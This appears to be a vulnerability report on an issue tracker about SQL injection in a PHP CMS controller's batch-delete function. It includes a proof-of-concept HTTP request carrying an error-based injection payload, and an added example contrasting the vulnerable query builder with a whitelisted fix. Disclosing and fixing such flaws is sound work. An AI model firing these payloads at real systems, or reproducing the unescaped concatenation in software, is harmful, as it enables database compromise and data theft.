\App\Manage\Controller\KefuController.class.php has SQLinject #13

Open
f4cky0u opened this issue Jan 12, 2023 · 0 comments
f4cky0u commented Jan 12, 2023

line: 157 - 196
```php
public function delall(){
    //dump($_POST);
    //exit;
    $m=D('Advert'); // database table; the table prefix is defined in the config file, so it is not written here
    $id = I('post.id');
    //dump($id);
    //exit;
    if ($id==null){
        $this->error('Please select items to delete!');
    }
    // Check whether id is an array or a single value
    if(is_array($id)){
        // $id values are concatenated unescaped into the condition string (injection point)
        $where = 'id in('.implode(',',$id).')';
        // implode() returns a string built from the array elements
    }else{
        // single value, likewise concatenated without quoting or casting
        $where = 'id='.$id;
    }
    //dump($where);
    //exit;

    $m=M('Advert');
    // raw string condition is passed straight to the query builder
    $arr=$m->where($where)->select();

    foreach ($arr as $key => $value){
        $images=$value['advert_image'];
        //dump($images);
        //exit;
        unlink('./Uploads/'.$images);
    }

    $count=$m->where($where)->delete(); // use save() to update a record
    if ($count>0){
        $this->success("Successfully deleted {$count} record(s)!");
    }
    else {
        $this->error('Batch delete failed!');
    }

}
```

Because the ThinkPHP framework's safe query syntax is not used here and $id is concatenated directly into the $where variable used for the query, this results in a serious SQL injection vulnerability, which may cause serious harm to the system.


poc:
```http
POST /index.php/manage/kefu/delall HTTP/1.1
Host: www.tuzi.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=4o7ddlgmm58fnm8ngse5v5eaq2
x-forwarded-for: 8.8.8.8
x-originating-ip: 8.8.8.8
x-remote-ip: 8.8.8.8
x-remote-addr: 8.8.8.8
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 73

id=1/**/and/**/(extractvalue(1,concat(0x7e,(select/**/user()),0x7e)))
```

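The following is an added example written for this page; it is not code from the issue author or from the project. It puts the where-clause construction from `delall()` next to a hardened version as plain PHP functions, so the difference can be run and inspected without ThinkPHP or a database. The function names, the ThinkPHP 3.x array-condition shape `array('id' => array('in', ...))` returned by the hardened version, and the copy of the PoC payload are assumptions made for the example. Note that `I('post.id')` with ThinkPHP's default filter only HTML-escapes the value, and the payload above contains no quotes or angle brackets, so that filter does not stop it.

```php
<?php
// Added example, not the project's code: vulnerable where-clause builder from
// delall() beside a hardened one. Runs with the PHP CLI, no framework needed.

// Vulnerable: same logic as the reported delall(). $id arrives from
// I('post.id') and is spliced straight into the condition string.
function buildWhereVulnerable($id): string
{
    if (is_array($id)) {
        return 'id in(' . implode(',', $id) . ')';
    }
    return 'id=' . $id;
}

// Hardened: accept only strings of decimal digits (or ints), cast them, and
// return a ThinkPHP 3.x style array condition (assumed shape:
// array('id' => array('in', array(1, 2, 3)))) that the query builder quotes
// itself instead of a raw SQL fragment. Returns null on any bad value so the
// caller can $this->error() before touching the database.
function buildWhereSafe($id): ?array
{
    $ids = is_array($id) ? $id : [$id];
    $clean = [];
    foreach ($ids as $v) {
        if (!is_int($v) && !is_string($v)) {
            return null;           // nested arrays/objects are never valid ids
        }
        $s = (string) $v;
        // Anything but pure digits is rejected: "1/**/and/**/(...)",
        // "1 OR 1=1", "-1", "" and "1,2" all fail this test.
        if (!preg_match('/^[0-9]+$/', $s)) {
            return null;
        }
        $clean[] = (int) $s;
    }
    if ($clean === []) {
        return null;
    }
    return ['id' => ['in', $clean]];
}

// Constructed copy of the PoC body from the issue, URL-decoded.
$payload = '1/**/and/**/(extractvalue(1,concat(0x7e,(select/**/user()),0x7e)))';

echo "vulnerable, single id : ", buildWhereVulnerable($payload), PHP_EOL;
echo "vulnerable, array id  : ", buildWhereVulnerable(['1', $payload]), PHP_EOL;
echo "hardened, payload     : ", var_export(buildWhereSafe($payload), true), PHP_EOL;
echo "hardened, valid ids   : ", json_encode(buildWhereSafe(['3', '7'])), PHP_EOL;
```

Running it shows the vulnerable builder emitting the payload verbatim as the condition, so MySQL evaluates `extractvalue()` and echoes the result of `user()` in the error message (the error-based technique the PoC relies on), while the hardened builder returns null for the payload and an `in` condition over integer ids for legitimate input. The same whitelist should be applied before the `unlink()` loop as well, since that loop runs on whatever rows the injected condition selects.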